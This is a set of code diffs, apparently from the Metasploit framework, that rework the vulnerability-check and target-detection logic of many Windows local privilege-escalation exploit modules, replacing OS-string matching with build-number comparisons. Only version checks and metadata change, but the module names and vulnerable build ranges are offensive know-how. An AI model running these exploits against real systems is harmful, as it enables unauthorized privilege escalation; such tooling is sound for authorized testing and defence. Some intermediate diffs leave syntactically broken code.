@@ -176,8 +176,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    vprint_status("Build Number = #{version._build}")
-    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909) 
+    vprint_status("OS version: #{version}")
+    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909)
+
     return Exploit::CheckCode::Safe
   end
 end

--- a/modules/exploits/windows/local/cve_2020_17136.rb
+++ b/modules/exploits/windows/local/cve_2020_17136.rb
@@ -112,8 +112,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
     end

--- a/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
+++ b/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
@@ -82,15 +82,12 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def target_compatible?
-    sysinfo_value = sysinfo['OS']
+    version = get_version_info
 
-    build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
-    vprint_status("Windows Build Number = #{build_num}")
-
-    return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
-    return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
-    return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19043)
-    return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19043)
+    vprint_status("Windows Build Number = #{version._build}")
+    return true if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) && version.workstation?
+    return true if version.build_number == Msf::WindowsVersion::Win81 && version.workstation?
+    return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_21H1)
 
     false
   end

--- a/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
+++ b/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
@@ -65,9 +65,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
+++ b/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
@@ -50,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Local
           'DefaultTarget' => 0,
           'Notes' => {
             'Stability' => [ CRASH_OS_RESTARTS, ],
-            'Reliability' => [ REPEATABLE_SESSION, ]
+            'Reliability' => [ REPEATABLE_SESSION, ],
+            'SideEffects' => [ IOC_IN_LOGS ]
           },
           'Compat' => {
             'Meterpreter' => {

--- a/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
+++ b/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
   def target_compatible?
     version = get_version_info
 
-    vprint_status("Windows Build Number = #{version._build}")
+    vprint_status("OS version: #{version}")
     return true if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) && version.workstation?
     return true if version.build_number == Msf::WindowsVersion::Win81 && version.workstation?
     return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_21H1)

--- a/modules/exploits/windows/local/cve_2021_40449.rb
+++ b/modules/exploits/windows/local/cve_2021_40449.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::File
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Version
   include Msf::Post::Windows::Process
   include Msf::Post::Windows::ReflectiveDLLInjection
   prepend Msf::Exploit::Remote::AutoCheck
@@ -73,11 +74,16 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
+    end
+
+    version_info = get_version_info
+    unless version_info.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_21H1) ||
+           version_info.build_number == Msf::WindowsVersion::Server2022 || 
+           version_info.build_number == Msf::WindowsVersion::Win11_21H1
+      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
     end
 
     build_num_raw = cmd_exec('cmd.exe /c ver')
@@ -87,11 +93,6 @@ class MetasploitModule < Msf::Exploit::Local
     else
       build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
       print_status("Target's build number: #{build_num}")
-    end
-
-    # see https://docs.microsoft.com/en-us/windows/release-information/
-    unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1809|1903)/
-      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
     end
 
     build_num_gemversion = Rex::Version.new(build_num)

--- a/modules/exploits/windows/local/cve_2021_40449.rb
+++ b/modules/exploits/windows/local/cve_2021_40449.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     version_info = get_version_info
     unless version_info.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_21H1) ||
-           version_info.build_number == Msf::WindowsVersion::Server2022 || 
+           version_info.build_number == Msf::WindowsVersion::Server2022 ||
            version_info.build_number == Msf::WindowsVersion::Win11_21H1
       return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
     end

--- a/modules/exploits/windows/local/cve_2022_21882_win32k.rb
+++ b/modules/exploits/windows/local/cve_2022_21882_win32k.rb
@@ -104,7 +104,6 @@ class MetasploitModule < Msf::Exploit::Local
       print_error('Vulnerability only present on Windows 10 versions 1803 - 21H2, Windows 11 21H2, Server 2019 and Server 2022')
       return CheckCode::Safe
     end
-
   end
 
   def exploit

--- a/modules/exploits/windows/local/cve_2022_21882_win32k.rb
+++ b/modules/exploits/windows/local/cve_2022_21882_win32k.rb
@@ -89,22 +89,22 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end
 
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Windows Build Number = #{build_num}")
-
-    unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
-      print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
+    version = get_version_info
+    vprint_status("Windows Build Number = #{version.product_name}")
+    if version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_21H2)
+      CheckCode::Appears
+    elsif version.build_number == Msf::WindowsVersion::Server2022 || version.build_number == Msf::WindowsVersion::Win11_21H2
+      CheckCode::Detected("May be vulnerable, but exploit not tested on #{version.product_name}")
+    else
+      print_error('Vulnerability only present on Windows 10 versions 1803 - 21H2, Windows 11 21H2, Server 2019 and Server 2022')
       return CheckCode::Safe
     end
 
-    CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb
+++ b/modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb
@@ -90,19 +90,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    s_info = sysinfo['OS']
-    unless s_info =~ /windows/i
+    unless session.platform == 'windows'
       return CheckCode::Safe('This module only supports Windows targets.')
     end
 
-    _major, _minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntdll.dll')
+    version = get_version_info
 
-    case s_info
-    when /windows 7/i
+    if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1)
       return CheckCode::Safe('Windows 7 is technically vulnerable, though it requires a reboot.')
-    when /windows 10/i, /windows 2019\+/i, /windows 2016\+/i # 2019 gets reported as 2016 by meterpreter
-      return CheckCode::Appears if build <= 18362
-      return CheckCode::Appears if revision < 1526
+    elsif version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_21H2) ||
+          version.build_number == Msf::WindowsVersion::Server2022 ||
+          version.build_number == Msf::WindowsVersion::Win11_21H2
+      return CheckCode::Appears
     end
 
     CheckCode::Safe
@@ -129,9 +128,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def target_is_server?
-    s_info = sysinfo['OS']
-
-    s_info =~ /server/i || s_info =~ /\d{4}\+/
+    version = get_version_info
+    version.windows_server?
   end
 
   # Windows usually has Print to PDF or XPS Document Writer

--- a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
+++ b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
@@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # see https://docs.microsoft.com/en-us/windows/release-information/
-    unless sysinfo_value =~ /(7|8|8\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2
       return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
     end
 
@@ -196,8 +197,8 @@ class MetasploitModule < Msf::Exploit::Local
   def check_target_is_running_supported_windows_version
     if !sysinfo['OS'].include?('Windows')
       fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
-    elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')
-      fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')
+    elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease
+      fail_with(Failure::NoTarget, 'Target is running Windows, but not a version this module supports! Bailing...')
     end
   end
 

--- a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
+++ b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
@@ -92,7 +92,9 @@ class MetasploitModule < Msf::Exploit::Local
 
     # see https://docs.microsoft.com/en-us/windows/release-information/
     version = get_version_info
-    unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2
+    unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_21H2) ||
+           version.build_number == Msf::WindowsVersion::Win11_21H2 ||
+           version.build_number == Msf::WindowsVersion::Server2022
       return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
     end
 
@@ -130,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Local
     if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11
       return CheckCode::Appears('Vulnerable Windows 11 build detected!')
     elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022
-      return CheckCode::Appears('Vulnerable Windows 11 build detected!')
+      return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
     elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2
       return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
     elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 20(03|08|12|16\+|16)/
+    version = get_version_info
+    if version.is_windows_server
       vprint_good('OS seems vulnerable.')
     else
       vprint_error('OS is not vulnerable!')

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.is_windows_server
+    if version.windows_server?
       vprint_good('OS seems vulnerable.')
     else
       vprint_error('OS is not vulnerable!')

--- a/modules/exploits/windows/local/ipass_launch_app.rb
+++ b/modules/exploits/windows/local/ipass_launch_app.rb
@@ -64,9 +64,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo['OS']
-
-    unless os =~ /windows/i
+    unless session.platform == 'windows'
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/exploits/windows/local/lenovo_systemupdate.rb
+++ b/modules/exploits/windows/local/lenovo_systemupdate.rb
@@ -70,9 +70,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo['OS']
-
-    unless os =~ /windows/i
+    unless session.platform == 'windows'
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/exploits/windows/local/mov_ss.rb
+++ b/modules/exploits/windows/local/mov_ss.rb
@@ -106,7 +106,8 @@ class MetasploitModule < Msf::Exploit::Local
     if sysinfo['Architecture'] != ARCH_X64
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
-    if sysinfo['OS'] =~ /XP/
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::XP_SP3)
       fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
     end
   end

--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -97,11 +97,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo['OS']
-    case os
-    when /windows xp.*service pack 3/i
+    version = get_version_info
+    if version.build_number == Msf::WindowsVersion::XP_SP3
       return Exploit::CheckCode::Appears
-    when /windows xp/i
+    elsif version.xp_or_2003? && !version.windows_server?
       vprint_error('Unsupported version of Windows XP detected')
       return Exploit::CheckCode::Detected
     else

--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Validate OS version
-    winver = sysinfo["OS"]
-    unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Win7_SP1)
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
     mytarget = target
     if mytarget.name =~ /Automatic/
       version = get_version_info
-      mytarget = targets[1] if version.build_number.between?(Msf::WindowsVersion::XP_SP2, Msf::WindowsVersion::XP_SP3) 
+      mytarget = targets[1] if version.build_number.between?(Msf::WindowsVersion::XP_SP2, Msf::WindowsVersion::XP_SP3)
       mytarget = targets[2] if version.build_number == Msf::WindowsVersion::Server2003_SP2
 
       if mytarget.name =~ /Automatic/

--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -127,12 +127,9 @@ class MetasploitModule < Msf::Exploit::Local
 
     mytarget = target
     if mytarget.name =~ /Automatic/
-      os = sysinfo['OS']
-      mytarget = targets[1] if os =~ /windows xp/i
-      mytarget = targets[2] if (os =~ /2003/) && (os =~ /service pack 2/i)
-      if (os =~ /\.net server/i) && (os =~ /service pack 2/i)
-        mytarget = targets[2]
-      end
+      version = get_version_info
+      mytarget = targets[1] if version.build_number.between?(Msf::WindowsVersion::XP_SP2, Msf::WindowsVersion::XP_SP3) 
+      mytarget = targets[2] if version.build_number == Msf::WindowsVersion::Server2003_SP2
 
       if mytarget.name =~ /Automatic/
         print_error('Could not identify the target system, it may not be supported')
@@ -142,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if is_system?
-      print_error('This meterpreter session is already running as SYSTE')
+      print_error('This meterpreter session is already running as SYSTEM')
       return
     end
 

--- a/modules/exploits/windows/local/ms13_053_schlamperei.rb
+++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb
@@ -68,8 +68,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-    unless (os =~ /windows/i)
+    unless session.platform == 'windows'
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb
@@ -65,8 +65,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-    if (os =~ /windows/i) == nil
+    if session.platform != 'windows'
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
@@ -75,9 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-
-    if os !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb
+++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb
@@ -76,9 +76,9 @@ class MetasploitModule < Msf::Exploit::Local
     temp = get_env('WINDIR')
     dll_path = "#{temp}\\System32\\TSWbPrxy.exe"
 
-    win_ver = sysinfo['OS']
+    version = get_version_info
 
-    unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/
+    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Server2012_R2)
       return Exploit::CheckCode::Safe
     end
 
@@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment')
     end
 
-    win_ver = sysinfo['OS']
-    if win_ver =~ /Windows 2012|Windows 8/
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win8, Msf::WindowsVersion::Win81)
       fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment')
     end
 

--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -69,9 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.18105 (Works)
 
-    if sysinfo['OS'] !~ /windows/i
-      return Exploit::CheckCode::Unknown
-    end
+    unless session.platform == 'windows'
 
     file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
     major, minor, build, revision, branch = file_version(file_path)

--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -70,6 +70,8 @@ class MetasploitModule < Msf::Exploit::Local
     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.18105 (Works)
 
     unless session.platform == 'windows'
+      return Exploit::CheckCode::Unknown
+    end
 
     file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
     major, minor, build, revision, branch = file_version(file_path)

--- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
+++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@@ -308,7 +308,8 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     # We have tested only windows 8.1
-    if sysinfo['OS'] !~ /Windows 8/i
+    version = get_version_info
+    unless version.build_number != Msf::WindowsVersion::Win81 && !version.windows_server?
       return Exploit::CheckCode::Unknown
     end
 

--- a/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb
+++ b/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb
@@ -53,15 +53,14 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     # Windows 7 SP0/SP1 (64-bit)
 
-    if sysinfo['OS'] !~ /windows/i
+    unless session.platform == 'windows'
       return Exploit::CheckCode::Unknown
     end
 
-    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
-    major, minor, build, revision, branch = file_version(file_path)
-    vprint_status("ntoskrnl.exe file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+    version = get_version_info
+    vprint_status("OS Version: #{version.product_name}")
 
-    return Exploit::CheckCode::Safe if build > 7601
+    return Exploit::CheckCode::Safe unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) && version.workstation?
 
     return Exploit::CheckCode::Appears
   end

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -76,9 +76,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-
-    if os !~ /win/i
+    unless session.platform == 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -123,35 +123,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = client.sys.config.sysinfo['OS']
-    build = os.match(/Build (\d+)/)
     privs = client.sys.config.getprivs
     # Fast fails
     if !privs.include?('SeImpersonatePrivilege')
       print_bad('Target session is missing the SeImpersonatePrivilege.')
       return Exploit::CheckCode::Safe
     end
-    if (os =~ /NT|XP|2003|.NET Server/) || (os =~ /2008/ && os !~ /2008 R2/)
-      print_bad('Microsoft Windows before Server 2008 R2 are not vulnerable.')
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Server2008_R2_SP0, Msf::WindowsVersion::Win10_1803)
+      print_bad("System not vulnerable (#{version.product_name})")
       return Exploit::CheckCode::Safe
     end
-    # Windows 10 after build 17134 (April 2018 update, version 1803) is not
-    # vulnerable. Due to changes in OS names, detecting the difference between
-    # Server 2016/19 is most reliably done with build numbers:
-    # (https://github.com/rapid7/metasploit-payloads/pull/355)
-    if build.nil?
-      print_warning('Could not determine Windows build number - exploiting might fail.')
-    else
-      build_number = build[1].to_i
-      if build_number > 17134
-        print_bad("Target appears to be patched (#{os})")
-        return Exploit::CheckCode::Safe
-      elsif build_number < 7601
-        print_bad("Target appears to be too old (#{os})")
-        return Exploit::CheckCode::Safe
-      end
-    end
-    print_good("Target appears to be vulnerable (#{os})")
+    print_good("Target appears to be vulnerable (#{version.product_name})")
     return Exploit::CheckCode::Appears
   end
 
@@ -162,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
     @payload_name = datastore['PAYLOAD']
     @payload_arch = framework.payloads.create(@payload_name).arch
     if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
+      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege, or OS not exploitable')
     end
     if @payload_arch.first == ARCH_X64
       dll_file_name = 'juicypotato.x64.dll'

--- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
+++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb
@@ -72,8 +72,9 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if sysinfo['OS'] =~ /XP|NT/i
-      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP2, Msf::WindowsVersion::Server2008_R2_SP1)
+      fail_with(Failure::Unknown, "The exploit binary does not support #{version.product_name}")
     end
 
     return target unless target.name == 'Automatic'

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -181,8 +181,7 @@ class MetasploitModule < Msf::Exploit::Local
     if version.build_number == Msf::WindowsVersion::XP_SP3 ||
        version.build_number == Msf::WindowsVersion::Server2003_SP2
       return Exploit::CheckCode::Appears
-    elsif version.major_release == Msf::WindowsVersion::MajorRelease::XP ||
-          version.major_release == Msf::WindowsVersion::MajorRelease::Server2003
+    elsif version.build_number >= Msf::WindowsVersion::XP_SP0 && version.build_number < Msf::WindowsVersion::Win7
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -177,15 +177,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo['OS']
-    case os
-    when /windows xp.*service pack 3/i
+    version = get_version_info
+    if version.build_number == Msf::WindowsVersion::XP_SP3 ||
+       version.build_number == Msf::WindowsVersion::Server2003_SP2
       return Exploit::CheckCode::Appears
-    when /(2003|\.net server).*service pack 2/i
-      return Exploit::CheckCode::Appears
-    when /windows xp/i
-      return Exploit::CheckCode::Detected
-    when /(2003|\.net server)/i
+    elsif version.major_release == Msf::WindowsVersion::MajorRelease::XP ||
+          version.major_release == Msf::WindowsVersion::MajorRelease::Server2003
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -200,14 +197,11 @@ class MetasploitModule < Msf::Exploit::Local
     my_target = nil
     if target.name =~ /Automatic/
       print_status('Detecting the target system...')
-      os = sysinfo['OS']
-      if os =~ /windows xp.*service pack 3/i
+      version = get_version_info
+      if version.build_number == Msf::WindowsVersion::XP_SP3 ||
         my_target = targets[1]
         print_status("Running against #{my_target.name}")
-      elsif (os =~ /2003/) && (os =~ /service pack 2/i)
-        my_target = targets[2]
-        print_status("Running against #{my_target.name}")
-      elsif (os =~ /\.net server/i) && (os =~ /service pack 2/i)
+      elsif version.build_number == Msf::WindowsVersion::Server2003_SP2
         my_target = targets[2]
         print_status("Running against #{my_target.name}")
       end

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Local
     if version.build_number == Msf::WindowsVersion::XP_SP3 ||
        version.build_number == Msf::WindowsVersion::Server2003_SP2
       return Exploit::CheckCode::Appears
-    elsif version.build_number >= Msf::WindowsVersion::XP_SP0 && version.build_number < Msf::WindowsVersion::Win7
+    elsif version.xp_or_2003?
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/novell_client_nicm.rb
+++ b/modules/exploits/windows/local/novell_client_nicm.rb
@@ -153,8 +153,8 @@ class MetasploitModule < Msf::Exploit::Local
     my_target = nil
     if target.name =~ /Automatic/
       print_status("Detecting the target system...")
-      os = sysinfo["OS"]
-      if os =~ /windows 7/i
+      version = get_version_info
+      if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) && !version.windows_server?
         my_target = targets[1]
         print_status("Running against #{my_target.name}")
       end

--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -207,9 +207,9 @@ class MetasploitModule < Msf::Exploit::Local
     my_target = nil
     if target.name =~ /Automatic/
       print_status("Detecting the target system...")
-      os = sysinfo["OS"]
-      print_status("#{os.inspect}")
-      if os =~ /windows xp/i
+      version = get_version_info
+      print_status("#{version.product_name}")
+      if version.build_number == Msf::WindowsVersion::XP_SP3
         my_target = targets[1]
         print_status("Running against #{my_target.name}")
       end

--- a/modules/exploits/windows/local/ntapphelpcachecontrol.rb
+++ b/modules/exploits/windows/local/ntapphelpcachecontrol.rb
@@ -96,7 +96,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 8/
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::Win8, Msf::WindowsVersion::Win81)
       return Exploit::CheckCode::Detected
     end
 

--- a/modules/exploits/windows/local/ntusermndragover.rb
+++ b/modules/exploits/windows/local/ntusermndragover.rb
@@ -16,48 +16,48 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(
-        update_info(
-          info,
-          'Name' => 'Microsoft Windows NtUserMNDragOver Local Privilege Elevation',
-          'Description' => %q{
-            This module exploits a NULL pointer dereference vulnerability in
-            MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
+      update_info(
+        info,
+        'Name' => 'Microsoft Windows NtUserMNDragOver Local Privilege Elevation',
+        'Description' => %q{
+          This module exploits a NULL pointer dereference vulnerability in
+          MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
 
-            The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
-            function does not effectively check the validity of the tagPOPUPMENU
-            objects it processes before passing them on to MNGetpItemFromIndex(),
-            where the NULL pointer dereference will occur.
+          The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
+          function does not effectively check the validity of the tagPOPUPMENU
+          objects it processes before passing them on to MNGetpItemFromIndex(),
+          where the NULL pointer dereference will occur.
 
-            This module has been tested against Windows 7 x86 SP0 and SP1. Offsets
-            within the solution may need to be adjusted to work with other versions
-            of Windows, such as Windows Server 2008.
-          },
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'Clément Lecigne', # discovery
-            'Grant Willcox', # exploit
